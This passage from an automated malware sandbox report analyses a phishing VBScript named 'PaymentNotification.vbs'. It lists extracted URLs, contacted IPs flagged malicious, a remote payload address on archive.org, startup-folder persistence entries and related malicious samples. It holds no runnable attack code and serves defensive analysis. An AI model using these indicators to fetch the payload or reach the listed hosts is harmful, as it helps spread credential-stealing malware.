                      • Avira URL Cloud: safe
                      unknown
                      http://www.jiyu-kobo.co.jp/8tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.jiyu-kobo.co.jp/3tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.jiyu-kobo.co.jp/vno8tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.jiyu-kobo.co.jp/wabtmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://whatismyipaddress.com/-pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.drfalse
                        high
                        http://www.galapagosdesign.com/DPleasetmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.carterandcone.comafet6tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.site.com/logs.phptmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmpfalse
                          high
                          https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://cvbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmpfalse
                            high
                            http://www.urwpp.deDPleasetmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.comditatmpFB21.tmp.exe, 0000000D.00000003.496944356.0000000005AB3000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.nirsoft.net/tmpFB21.tmp.exe.2.drfalse
                              high
                              http://www.zhongyicts.com.cntmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://certificates.godaddy.com/repository/gdig2.crt0wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmpfalse
                                high
                                http://www.carterandcone.comhly#tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametmp87E4.tmp.exe, 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.carterandcone.comMP_tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  https://2542116.fls.doubleclick.net/activivbc.exe, 0000000F.00000003.517667198.000000000210C000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.galapagosdesign.com/tmpFB21.tmp.exe, 0000000D.00000003.498837679.0000000005AB6000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://crl.godaddy.com/gdig2s1-1597.crl0wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmpfalse
                                      high
                                      http://certs.godaddy.com/repository/1301wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.jiyu-kobo.co.jp/LtmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.covbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.jiyu-kobo.co.jp/GtmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://certs.godaddy.com/repository/0wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmpfalse
                                            high
                                            https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736vbc.exe, 0000000F.00000003.518065717.000000000094E000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.carterandcone.comltmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://crl.godaddy.com/gdroot-g2.crl0Fwscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmpfalse
                                                high
                                                http://crl.godaddy.com/gdroot-g2.crl0=wwscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.com/designers/frere-jones.htmltmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.jiyu-kobo.co.jp/rtmpFB21.tmp.exe, 0000000D.00000003.495838585.0000000005AAB000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.comcomFtmpFB21.tmp.exe, 0000000D.00000003.501081618.0000000005AA5000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.jiyu-kobo.co.jp/hettmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://fontfabrik.com;tmpFB21.tmp.exe, 0000000D.00000003.493276632.0000000005AA3000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    low
                                                    http://www.jiyu-kobo.co.jp/itmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.comitutmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.founder.com.cn/cn)tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fontbureau.com/designersGtmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.com/designers/?tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.founder.com.cn/cn/bThetmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.jiyu-kobo.co.jp/jp/GtmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://certificates.godaddy.com/repository/0wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.fontbureau.com/designers?tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.carterandcone.comaltmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.tiro.comtmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/jp/3tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.goodfont.co.krtmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.carterandcone.comtmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.typography.netDtmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.galapagosdesign.com/staff/dennis.htmtmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://fontfabrik.comtmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.founder.com.cn/cnlwtmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.founder.com.cn/cnmtmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.jiyu-kobo.co.jp/argetmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.jiyu-kobo.co.jp/jp/itmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.carterandcone.comfacbtmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.founder.com.cn/cnutmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.carterandcone.com;tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                low
                                                                https://login.yahoo.com/config/logintmpFB21.tmp.exefalse
                                                                  high
                                                                  http://www.fonts.comtmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.sandoll.co.krtmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.urwpp.detmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://www.sakkal.comtmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.galapagosdesign.com/staff/dennis.htmQKtmpFB21.tmp.exe, 0000000D.00000003.498837679.0000000005AB6000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.apache.org/licenses/LICENSE-2.0tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        http://www.fontbureau.comtmpFB21.tmp.exe, 0000000D.00000003.496944356.0000000005AB3000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt3uwscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://www.fontbureau.comFtmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.jiyu-kobo.co.jp/Y0ettmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.jiyu-kobo.co.jp/uditmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.fontbureau.comessed8tmpFB21.tmp.exe, 0000000D.00000003.497421413.0000000005AB4000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://ia601504.us.archive.org/3wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://www.jiyu-kobo.co.jp/jp/rtmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.founder.com.cn/cn/StmpFB21.tmp.exe, 0000000D.00000003.494591560.0000000005AA2000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.jiyu-kobo.co.jp/jp/tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.fontbureau.comatmpFB21.tmp.exe, 0000000D.00000003.501081618.0000000005AA5000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.fontbureau.comTTFdtmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.fontbureau.comdtmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.fontbureau.comditmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txtwscript.exe, 00000000.00000003.340835595.000001B863D52000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.369127141.000001B865B94000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.361151297.000001B863DE7000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.373459438.000001B865C70000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.368780987.000001B865B73000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.373627611.000001B865F9B000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://www.fontbureau.com/designers/cabarga.htmlNtmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.founder.com.cn/cntmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.monotype.tmpFB21.tmp.exe, 0000000D.00000003.500377718.0000000005ADD000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://crl.gwscript.exe, 00000000.00000003.340516433.000001B8665AF000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.jiyu-kobo.co.jp/tmpFB21.tmp.exe, 0000000D.00000003.495838585.0000000005AAB000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://crl.godaddy.com/gdroot.crl0Fwscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://ia601504.us.archive.org/wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.fontbureau.com/designers8tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.jiyu-kobo.co.jp/uildtmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown

                                                                                        Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        104.16.154.36
                                                                                        whatismyipaddress.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        103.6.196.196
                                                                                        neesoontat.com.myMalaysia
                                                                                        46015EXABYTES-AS-APExaBytesNetworkSdnBhdMYtrue
                                                                                        207.241.227.114
                                                                                        ia601504.us.archive.orgUnited States
                                                                                        7941INTERNET-ARCHIVEUSfalse
                                                                                        185.140.53.71
                                                                                        unknownSweden
                                                                                        209623DAVID_CRAIGGGtrue

                                                                                        Private

                                                                                        IP
                                                                                        192.168.2.1

                                                                                        General Information

                                                                                        Joe Sandbox Version:32.0.0 Black Diamond
                                                                                        Analysis ID:399489
                                                                                        Start date:28.04.2021
                                                                                        Start time:20:48:42
                                                                                        Joe Sandbox Product:CloudBasic
                                                                                        Overall analysis duration:0h 15m 7s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:light
                                                                                        Sample file name:PaymentNotification.vbs
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                        Number of analysed new started processes analysed:18
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • HDC enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Detection:MAL
                                                                                        Classification:mal100.phis.troj.adwa.spyw.evad.winVBS@22/17@5/5
                                                                                        EGA Information:Failed
                                                                                        HDC Information:
                                                                                        • Successful, ratio: 11.4% (good quality ratio 10.8%)
                                                                                        • Quality average: 79.8%
                                                                                        • Quality standard deviation: 27.8%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 99%
                                                                                        • Number of executed functions: 0
                                                                                        • Number of non-executed functions: 0
                                                                                        Cookbook Comments:
                                                                                        • Adjust boot time
                                                                                        • Enable AMSI
                                                                                        • Found application associated with file extension: .vbs
                                                                                        Warnings:
                                                                                        Show All
                                                                                        • Excluded IPs from analysis (whitelisted): 168.61.161.212, 40.88.32.150, 2.23.155.226, 2.23.155.211, 2.23.155.234, 2.23.155.192, 2.23.155.187, 2.23.155.194, 2.23.155.201, 2.23.155.185, 2.23.155.209, 2.20.142.210, 2.20.142.209, 67.26.139.254, 8.238.36.254, 8.248.149.254, 67.27.233.254, 67.26.137.254, 23.57.80.111
                                                                                        • TCP Packets have been reduced to 100
                                                                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, 2-01-3cf7-0009.cdx.cedexis.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com, a767.dscg3.akamai.net, a767.dspw65.akamai.net, wu-fg-shim.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, download.windowsupdate.com.edgesuite.net, skypedataprdcoleus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        20:49:54AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe
                                                                                        20:50:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe
                                                                                        20:50:30API Interceptor2x Sleep call for process: tmp87E4.tmp.exe modified
                                                                                        20:50:55API Interceptor75x Sleep call for process: tmpFB21.tmp.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                        104.16.154.36YpyXT7Tnik.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        Payment Advice GLV225445686.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        nzGUqSK11D.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        B6LNCKjOGt5EmFQ.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        BANK-STATMENT _xlsx.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        INQUIRY.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        c9o0CtTIYT.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        6JLHKYvboo.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        khJdbt0clZ.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        ZMOKwXqVHO.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        5Av43Q5IXd.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        8oaZfXDstn.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        9vdouqRTh3.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        M9RhKQ1G91.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        0CyK3Y7XBs.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        pwYhlZGMa6.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        Vll6ZcOkEQ.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        oLHQIQAI3N.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        YrHUxpftPs.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/
                                                                                        WuGzF7ZJ7P.exeGet hashmaliciousBrowse
                                                                                        • whatismyipaddress.com/

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                        whatismyipaddress.comHID Purchase LedgerAdvice - 2001330.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        HID Purchase LedgerAdvice - 2001330.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        X5zr4r9Dbf.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        4IttFJZwMj.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        C8XAVCtsW4.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        u2qcULTj3T.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        u2qcULTj3T.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        Gzw4s0btmW.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        2NijKfXlSp.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        Gzw4s0btmW.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        RemittanceAdvice271-20210410-19143_212-50-20210410-203126128.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        RemittanceAdvice271-20210410-19143_212-50-20210410-203126128.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        Cg8OqFNi9n.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        Cg8OqFNi9n.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        UJu0Qiol0P.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        UJu0Qiol0P.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        B5nWfQK0n6.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        2dyOkBlRGM.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        czXGMilScJ.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178
                                                                                        B5nWfQK0n6.jarGet hashmaliciousBrowse
                                                                                        • 66.171.248.178

                                                                                        ASN

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                        EXABYTES-AS-APExaBytesNetworkSdnBhdMYPUR-21601146 SOP-21001146_PDF.exeGet hashmaliciousBrowse
                                                                                        • 137.59.110.57
                                                                                        SOA.exeGet hashmaliciousBrowse
                                                                                        • 103.6.198.37
                                                                                        PUR-21601146 SOP-21001146_PDF.exeGet hashmaliciousBrowse
                                                                                        • 137.59.110.57
                                                                                        PUMP RFQ.exeGet hashmaliciousBrowse
                                                                                        • 103.6.198.237
                                                                                        #10020213.exeGet hashmaliciousBrowse
                                                                                        • 103.6.198.237
                                                                                        Enquiry 042021 Golden M_PDF.exeGet hashmaliciousBrowse
                                                                                        • 137.59.110.57
                                                                                        confirm below invoice.exeGet hashmaliciousBrowse
                                                                                        • 103.6.198.37
                                                                                        Enquiry 042021 Emine INCE_PDF.exeGet hashmaliciousBrowse
                                                                                        • 137.59.110.57
                                                                                        #10001210.exeGet hashmaliciousBrowse
                                                                                        • 103.6.198.237
                                                                                        TRANSACTION_INTTRANSFER_1617266945242_PDF.exeGet hashmaliciousBrowse
                                                                                        • 137.59.110.57
